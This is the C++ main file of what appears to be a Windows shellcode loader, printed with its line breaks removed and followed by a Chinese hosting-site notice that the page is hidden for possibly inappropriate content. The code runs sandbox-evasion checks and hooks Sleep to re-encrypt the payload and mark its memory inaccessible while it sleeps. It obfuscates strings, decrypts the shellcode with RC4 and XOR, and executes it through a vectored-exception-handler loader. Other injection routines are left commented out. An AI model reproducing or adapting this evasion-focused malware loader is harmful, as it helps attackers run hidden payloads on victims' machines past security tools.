#include<stdio.h>#include<Windows.h>#include"CodeInject.h"#include"AntiSandbox.h"#include"Loader.h"#include"shellcode.h"#include"MyHook.h"#include"xorstr.hpp"#include"Crypto.h"CInlineHook MyHookObj;VOID WINAPI DetourSleep(_In_ DWORD dwMilliseconds){DWORD OldProtect = 0;MyHookObj.UnHook64();Crypto::XORrecoder(shellcode, len_shellcode, xor_key);Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);VirtualProtect(shellcode, 0x1000, PAGE_NOACCESS, &OldProtect);Sleep(dwMilliseconds);VirtualProtect(shellcode, 0x1000, PAGE_EXECUTE_READWRITE, &OldProtect);Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);Crypto::XORrecoder(shellcode, len_shellcode, xor_key);MyHookObj.ReHook64();}void __forceinline delay(){for (int i = 0; i < 0xFFFFFF*5; ++i)Sleep(0);}int main(){#ifdef ENCODECrypto::XORrecoder(shellcode, len_shellcode, xor_key);Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);for (size_t i = 0; i < len_shellcode; i++)printf("0x%02x,", shellcode[i]);#else//CHAR MyName[MAX_PATH] = "nvcontainer.exe";//AntiSandbox::AntiSandboxByName(MyName);AntiSandbox::AntiSandboxByRuntime();//AntiSandbox::AntiSandboxByRuntimeEx();delay();MyHookObj.Hook64(xorstr_("KERNEL32.DLL"), xorstr_("Sleep"), (PROC)DetourSleep);Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);Crypto::XORrecoder(shellcode, len_shellcode, xor_key);//Loader::RunShellCode_1(shellcode);//Loader::RunShellCode_2(shellcode);//Loader::InjectShellCode_1(shellcode);//Loader::CertEnumSystemStoreCallbackRunShellcode(shellcode);Loader::VehRunShellcode(shellcode);#endifreturn 0;}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。